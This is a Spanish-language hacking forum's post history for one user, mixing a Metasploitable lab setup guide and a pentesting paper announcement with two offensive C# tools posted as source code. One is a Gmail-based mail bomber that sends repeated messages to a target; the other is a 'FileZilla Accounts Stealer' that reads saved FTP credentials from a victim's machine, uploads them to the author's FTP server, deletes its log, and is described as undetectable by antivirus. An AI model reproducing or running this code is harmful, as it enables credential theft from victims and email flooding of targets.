elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6
1  Seguridad Informática / Hacking / Metasploitable Maquina Virtual Vulnerable en: 3 Septiembre 2012, 07:20 am


Uno de los problemas comunes que he visto en los foros es gente queriendo explotar X vulnerabilidad en un sistema con Metasploit Framework basandose en algun videotutorial pero siempre terminan preguntando por que no les funciona o no les crea una sesion en el sistema y eso por que obviamente no es vulnerable, bueno con Metasploitable pudes practicar con Metasploit o algun otra herramienta de explotacion.
Metasploitable es un maquina virtual (ubuntu 8.0 creo) con software y servicios viejos y vulnerables para que podamos practicar con ellos.
Vamos a instalarlo, para esto usaremos virtualbox, pero tambien pueden utilizar vmware u otro.

Instalacion:
Primero vamos a descargar y descomprimir metasploitable en la carpeta de nuestro virualbox.


DESCARGA:
TORRENT

Abrimos virtualbox y le damos click en nuevo


Le ponemos un nombre a nuestra nueva maquina virtual y como sistema operativo seleccionamos linux y como version ubuntu


Asignamos la RAM que tendra nuestra maquina, 512mb es mas que suficiente


Ahora creamos el disco virtual, en esta parte no creamos uno nuevo si no seleccionamos uno existente, este viene en la carpeta que descomprimimos (Metasploitable.vmdk), lo seleccionamos y damos siguiente


Esto es todo solo damos en crear y listo con esto ya tenemos creado nuestra maquina virtual vulnerable



Solo nos falta configurar el adaptador de red para poder interactuar con nustra maquina virtual vulnerable en la red local, para esto vamos a dar click derecho sobre la maquina virtual, click en configuracion, nos vamos a "Network", despues en el "Adaptador 1" seleccionamos "Bridged Adapter" que en español seria adaptador puente o algo asi lol


Para jugar con ella solo queda darle click en iniciar (:


Para verificar que todo funciona bien podemos hacerle un escaneo de puertos a nuestra maquina virtual con nmap


Y como pudes ver en la imagen anterior tiene muchos puertos y servicios corriendo, y todos vulnerables (:

FUENTE
2  Seguridad Informática / Seguridad / [PAPER]Penetration Testing I - Introduccion a los Test de Penetracion en: 25 Febrero 2012, 08:08 am
Penetration Testing I - Introduccion a los Test de Penetracion




Paper introductorio a los test de penetracion, en esta serie de papers se llevara acabo un test de penetracion completo en una red empresarial real, este primer paper es solo introductorio a los conceptos basicos y metodologias actuales con las que se llevan a cabo los test de penetracion en diferentes empresas hoy en dia. Dependiendo del interes de los usuarios se publicaran las siguientes partes de esta serie de papers donde mostrare como se hace un test de penetracion de manera teorica y practica en una red empresarial real.

ÍNDICE

•PRESENTACIÓN

•INTRODUCCIÓN A LOS TEST DE PENETRACIÓN
¿QUE ES UN TEST DE PENETRACIÓN?
DEFINICIÓN
PRINCIPIOS BÁSICOS DE LA SEGURIDAD
¿QUE SE BUSCA CON LOS TEST DE PENETRACION?
METODOLOGÍAS DE LOS TEST DE PENETRACION

•TIPOS DE TEST DE PENETRACIÓN
TEST DE CAJA NEGRA
TEST DE CAJA BLANCA
TEST DE CAJA GRIS

•ETAPAS EN LOS TEST DE PENETRACIÓN
ETAPA DE RECONOCIMIENTO Y ENUMERACIÓN
ETAPA DE ANÁLISIS
ETAPA DE EXPLOTACIÓN
ETAPA DE DOCUMENTACIÓN
ETAPA DE HARDENING

•CONCLUSIÓN

•REFERENCIAS



Descarga:
http://www.mediafire.com/?b8ec9qcviscdd9w

Contraseña:
Backroot.org
3  Programación / .NET (C#, VB.NET, ASP) / Re: [SourceCode]MailBomber en: 24 Febrero 2012, 01:25 am
500 mensajes diarios máximo, despues si detectan que abusan demasiado, te cierran la cuenta.

Si, algo asi tengo entendido son 500 msjs diarios yo orita mande 100 de golpe y no paso nada XD oh y ya le puse hilos por si lo quieren usar como un mailbomber de verda XD, este era desmotrativo usando el cliente smtp, lo mando por mp a quien quiera el code para no volver a publicar.
4  Programación / .NET (C#, VB.NET, ASP) / Re: [SourceCode]MailBomber en: 23 Febrero 2012, 18:44 pm
Hace un tiempo hice un sms bomber usando el servidor smtp de Gmail, y lo que te recomendaria es que hagas uso de hilos para la parte que envia los mensajes ya que sino se congela la aplicacion, y mas aun si el numero de mensajes es muy alto.

Si por eso puse Simple al inicio del titulo XD, es solo para mostrar el uso de stmpclient, pero si luego le agrego hilos
5  Programación / .NET (C#, VB.NET, ASP) / [SourceCode]MailBomber en: 21 Febrero 2012, 21:11 pm
Simple Mail Bomber With Gmail SMTP Client


Aqui les dejo este pequeño codigo en C# de un mailbomber usando como cliente smtp Gmail

Código:
/*
  Name: CorruptedMailBomber
  Copyright: GNU General Public License
  Author: [C]orrupted[B]yte
  Date: 21/02/12
  Description: Simple MailBomber with Gmail smtp client
*/
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net.Mail;

namespace MailBomber
{
    public partial class frmMain : Form
    {
        public frmMain()
        {
            InitializeComponent();
        }

        private void frmMain_Load(object sender, EventArgs e)
        {
        }

        private void btnSend_Click(object sender, EventArgs e)
        {
            int intNum = Convert.ToInt32(txtNumber.Text);
            try
            {
                MailMessage Mail = new MailMessage();
                SmtpClient smtp = new SmtpClient("smtp.gmail.com");
                Mail.From = new MailAddress(txtGmail.Text);
                Mail.To.Add(txtTo.Text);
                Mail.Subject = txtSubject.Text;
                Mail.Body = txtBody.Text;
                smtp.Port = 587;
                smtp.Credentials = new System.Net.NetworkCredential(txtGmail.Text, txtPassword.Text);
                smtp.EnableSsl = true;
                while (intNum != 0)
                {
                    smtp.Send(Mail);
                    intNum--;
                }
                MessageBox.Show("Mail Bomb, Successful");
            }

            catch (Exception ex)
            {
                MessageBox.Show(ex.ToString());
            }
        }

        private void exitToolStripMenuItem_Click(object sender, EventArgs e)
        {
            this.Close();
        }

        private void aboutToolStripMenuItem_Click(object sender, EventArgs e)
        {
            frmAbout About = new frmAbout();
            About.Show();
        }

        private void helpToolStripMenuItem_Click(object sender, EventArgs e)
        {
            frmHelp Help = new frmHelp();
            Help.Show();
        }
    }
}

Pueden descargar el proyecto en VS2010 a continuacion:

Descarga:
http://www.mediafire.com/?24es9pftpu84etm
Contraseña:
Backroot.org
6  Programación / .NET (C#, VB.NET, ASP) / Re: [SourceCode]FileZilla Accounts Stealer en: 17 Febrero 2012, 22:12 pm
Perdon por no dejarlo claro.Al final del guardado del archivo:

 FileStream fsLogs = new FileStream(sLogsPath, FileMode.OpenOrCreate, FileAccess.Write);
                fsLogs.Close();
                StreamWriter swAccount = File.AppendText(sLogsPath);
                swAccount.WriteLine(sAccount);
                swAccount.Close();

A este me refiero.
¿se declara antes de usarlo?¿donde?

a claro streamwriter esta en using System.IO;
7  Programación / .NET (C#, VB.NET, ASP) / Re: [SourceCode]FileZilla Accounts Stealer en: 17 Febrero 2012, 19:47 pm
¡Gracias!
Estaba mirando lo de enviar archivos por algún medio y tengo una duda sobre StreamWriter...¿se tiene que declarar antes?

antes de que? de enviar?
8  Programación / .NET (C#, VB.NET, ASP) / [SourceCode]FileZilla Accounts Stealer en: 17 Febrero 2012, 19:26 pm
Hola, aqui les dejo un code que programe hace unos dias, su funcionamiento es basico al ejecutarlo guarda todas las cuentas FTP de filezilla en un documento de texto con el nombre de la maquina victima para diferenciarlos y los manda a tu servidor FTP seguido de eso elimina el fichero y aqui no paso nada XD. Es un codigo muy pequeño y sencillo pero 100% funcional e indetectable a cualquier antivirus o por lo menos hasta donde lo testee.

El codigo esta dividido en 3 clases para que le puedan dar uso por separado como ustedes guste.


Clase principal para la llamada de los metodos de las otras clases:
Código:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Net.NetworkInformation;
using System.IO;
using System.Xml;
using System.Threading;

namespace FileZillaStealer
{
    class Stealer
    {
        static void Main(string[] args)
        {
            string sLogs = IPGlobalProperties.GetIPGlobalProperties().HostName +"Logs.txt";
            AccountStealer StealAccounts = new AccountStealer();
            FTP SendAccounts = new FTP();
            StealAccounts.FileZillaAccounts(sLogs);
            SendAccounts.Send("ftp.server.com", "/public_html/", "user", "pass", sLogs);
            System.IO.File.Delete(sLogs);
        }
    }
}

Clase con el metodo sendo para enviar el fichero de texto con las cuentas guardadas:
Código:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Net;

namespace FileZillaStealer
{
    class FTP
    {
        public void Send(string sHost, string sDir, string sUser, string sPass, string sFile)
        {
            string ftpHostDirFile = "ftp://" + sHost +sDir +sFile;
            FtpWebRequest ftp = (FtpWebRequest)FtpWebRequest.Create(ftpHostDirFile);
            ftp.Credentials = new NetworkCredential(sUser, sPass);
            ftp.KeepAlive = true;
            ftp.UseBinary = true;
            ftp.Method = WebRequestMethods.Ftp.UploadFile;
            FileStream fs = File.OpenRead(sFile);
            byte[] buffer = new byte[fs.Length];
            fs.Read(buffer, 0, buffer.Length);
            fs.Close();
            Stream ftpstream = ftp.GetRequestStream();
            ftpstream.Write(buffer, 0, buffer.Length);
            ftpstream.Close();
        }
    }
}

Clase para el guarado de las cuentas de filezilla en un documento de texto:
Código:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Xml;
using System.Runtime.InteropServices;
using Microsoft.VisualBasic;

namespace FileZillaStealer
{
    class AccountStealer
    {
        public void FileZillaAccounts(string sLogsPath)
        {
            XmlDocument xmlAccountsFile = new XmlDocument();
            string sFilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + "\\FileZilla\\recentservers.xml";
            xmlAccountsFile.Load(sFilePath);
            XmlNodeList xmlRecentServers = xmlAccountsFile.GetElementsByTagName("RecentServers");
            XmlNodeList xmlList = ((XmlElement)xmlRecentServers[0]).GetElementsByTagName("Server");
            string sAccount;
            foreach (XmlElement nodo in xmlList)
            {
                XmlNodeList xmlHost = nodo.GetElementsByTagName("Host");
                XmlNodeList xmlPort = nodo.GetElementsByTagName("Port");
                XmlNodeList xmlUser = nodo.GetElementsByTagName("User");
                XmlNodeList xmlPass = nodo.GetElementsByTagName("Pass");
                sAccount = string.Format("Host: {0} Port: {1} User: {2} Pass: {3}", xmlHost[0].InnerText, xmlPort[0].InnerText, xmlUser[0].InnerText, xmlPass[0].InnerText);
                FileStream fsLogs = new FileStream(sLogsPath, FileMode.OpenOrCreate, FileAccess.Write);
                fsLogs.Close();
                StreamWriter swAccount = File.AppendText(sLogsPath);
                swAccount.WriteLine(sAccount);
                swAccount.Close();
            }
        }
}


Aqui les dejo el proyecto en VS2010:

Descarga:
http://www.mediafire.com/?2u2sns4d3rwdple
Contraseña:
Backroot.org
9  Programación / Programación C/C++ / Re: hacking etico!! en: 31 Julio 2011, 21:15 pm
he decidido iniciarme en seguridad informática para ser mas exacto en hacking ético y decidí empezar aprendiendo c++.

Quisiera q me digan alguna buena guía, tutorial o video tutorial de C++ enfocado en hacking ético.

Muchas gracias por su tiempo.
(cualquier consejo o tip es bienvenido)


tiene que ver en que C/C++ es muy bueno para la proramacion de exploits, injeccion de ddlls, etc... para seguridad informatica es un lenguaje muy bueno.

pero antes que nada debes de aprender mucha teoria sobre auditorias de seguridad informatica
10  Foros Generales / Foro Libre / Re: Cual es la velocidad mas alta a la que has descargado desde internet? en: 27 Julio 2011, 07:25 am
Yo en una universidad llege a bajar a 30mb/s me baje barios programas y peliculas en cuestion de minutos, no me lo podia creer  :-X pero bueno en mi casa apenas y llego a los 5mb/s
Páginas: [1] 2 3 4 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines